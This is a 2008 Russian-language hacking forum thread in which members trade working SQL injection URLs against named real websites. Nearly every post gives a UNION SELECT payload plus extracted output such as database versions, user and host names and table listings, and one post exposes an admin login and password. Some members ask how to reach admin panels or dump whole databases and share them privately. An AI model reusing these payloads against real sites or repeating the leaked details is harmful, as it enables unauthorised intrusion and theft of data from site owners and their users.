HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.02.2008, 05:57
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

http://eng.sistema-hals.ru/main.phtml?pid=3&addpid=-12'+union+select+concat_ws(0x3a,name,password%20%2 0%20)+from+users/*&nid=706&special=news
никак не могу в админку зайти
 
Ответить с цитированием

  #2  
Старый 26.02.2008, 06:38
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

мммммдаааааа
прикольная штука:
Система управления сайтом
Hacker? He-he




Ребята подксажите как узнать низвания таблиц ну и все остальное ПЛИЗ
вот линк
_http://www.umpcportal.com/products/product.php?id=-162+union+select+user(),database(),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,version() ,25,26,27,282,9,30,31,32,33,34,35,36,37/*

Последний раз редактировалось neon_fx; 26.02.2008 в 12:41..
 
Ответить с цитированием

  #3  
Старый 26.02.2008, 12:35
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

#######sql_inj#######
http://www.anba.com.br/ingles/noticias.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database())/*
---------------info---------------
4.0.27-LOCAWEB-LOG:ANBA@200.23
#######sql_inj#######
http://www.barrichello.com.br/equipe.php?l=-999+union+select+1,concat(version(),0x3a,user(),0x 3a,database())--
---------------info---------------
5.0.41--log:barrichello@200.234.200.44:barrichello

Последний раз редактировалось xcedz; 26.02.2008 в 13:37..
 
Ответить с цитированием

  #4  
Старый 26.02.2008, 13:31
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.atempo.com.tr/index.php?id=-442+union+select+1,user(),3,database(),5,6,7/*
user=atempoc_aboo@localhost
database=atempoc_atempo
varsion=4.0.26-log

Последний раз редактировалось neon_fx; 26.02.2008 в 13:36..
 
Ответить с цитированием

  #5  
Старый 26.02.2008, 13:43
wol4ara2
Новичок
Регистрация: 06.02.2008
Сообщений: 4
Провел на форуме:
34554

Репутация: 1
По умолчанию

http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&t ype=DESC

POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

name=1&mail=1&url=1&captcha=1&captcha_hash='&refer er=1&parentID=1&type=1&ip=1&savevisitorcomment=1


POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha =1&captcha_hash='&save=1

Скажите как вытянуть отсюда что-нибудь!!!!???
 
Ответить с цитированием

  #6  
Старый 26.02.2008, 13:54
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от wol4ara2  

Скажите как вытянуть отсюда что-нибудь!!!!???
вопросы задаем в другом топике.. -20
=======================================
#######sql_inj#######
http://www.hanima.com/new/gcat.php?l=2&uid=70dm9ftguhnb6n5estcl76vlh1&gcat=4 +union+select+1,2,3,4,concat(version(),0x3a,user() ,0x3a,database()),6,7,8,9/*
---------------info------------
4.1.20:hanima@localhost:hanima
#######sql_inj#######
http://frvmedia.com/1-communiques.php?xlang=fr&xid=-132'+union+select+1,2,3,concat(version(),0x3a,user (),0x3a,database()),5,6,7/*
---------------info------------
5.0.45:frvmedia_admin@localhost:frvmedia_main

Последний раз редактировалось xcedz; 26.02.2008 в 14:26..
 
Ответить с цитированием

  #7  
Старый 26.02.2008, 14:57
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.6seconds.org/cert/show.php?ID=-68+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,database(),22,23,24,25,26,27 ,28,version(),30,31,32,33,34,35,36,37,38,39/*

6cert@localhost 6
certlist
5.0.45-community
 
Ответить с цитированием

  #8  
Старый 26.02.2008, 15:13
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
По умолчанию

во, млин, запарило... по работе нужно лазить по чужим сайтам с ВЕЧЕРНИМИ ПЛАТЬЯМИ и смотреть разные фишки на сайтах...
после 10-го или 15-го решил отвлечься:
результат:
http://www.solange.ru/gallery/shop.phtm?s=99999+union+select+1,VERSION(),3,4,5/*

4.1.21-standard
intermoda@83.69.224.34
intermoda
 
Ответить с цитированием

  #9  
Старый 26.02.2008, 18:03
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

www.humanmedia.ru
Наша компания является эксклюзивным продавцом рекламного времени на тематических каналах «НТВ-Плюс». Фактически это новый инструмент рекламных коммуникаций.
version() >5 (information_schema)
Цитата:
_http://www.humanmedia.ru/page.php?id=2+and+1=-1+union+select+1,concat(0xEBEEE3E8ED202D20,login,0 x3C62723E,0xEFE0F0EEEBFC202D20,password,0x3C62723E EFF0E8E2FB202D20,priv),3,4,5,6,7,8,9,10+from+tv_ad mins
логин - nets
пароль - nets
привы - 1
Цитата:
17:tv_admins
18:tv_ban
19:tv_news
20:tv_pages
21:tv_sample
22:tv_subscribe
23:tv_subscribe_delivery
24:tv_variables
20:tv_pages
20:--1:title
20:--2:body
20:--3:description1
20:--4:description2
20:--5:description3
20:--6riority
20:--7ublic
20:--8id
20:--9:menu
17:tv_admins
17:--1:login
17:--2assword
17:--3:name
17:--4:email
17:--5riv
Админку ненашел 8( письмо админу отправил 8)
 
Ответить с цитированием

  #10  
Старый 26.02.2008, 20:41
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
-------------------------------
5.0.37-log
life
life@localhost
-------------------------------
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/*
-------------------------------
есть интересные таблицы: (но я их не перебирал)
board_admin_comment
f1
f1_bodies
f2
f2_bodies
f3
f3_bodies
f4
f4_bodies
f5
f5_bodies
forums
forums_auth
forums_forum2group
forums_groups
forums_moderators
forums_user2group
gal_user
guide
mail_archieve
maillist
maillist_users
poll_poll
poll_vote
prob
---------------------
если кто вытянет полную базу-киньте в личку(интересно посмотреть, а колупаться дальше влом
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ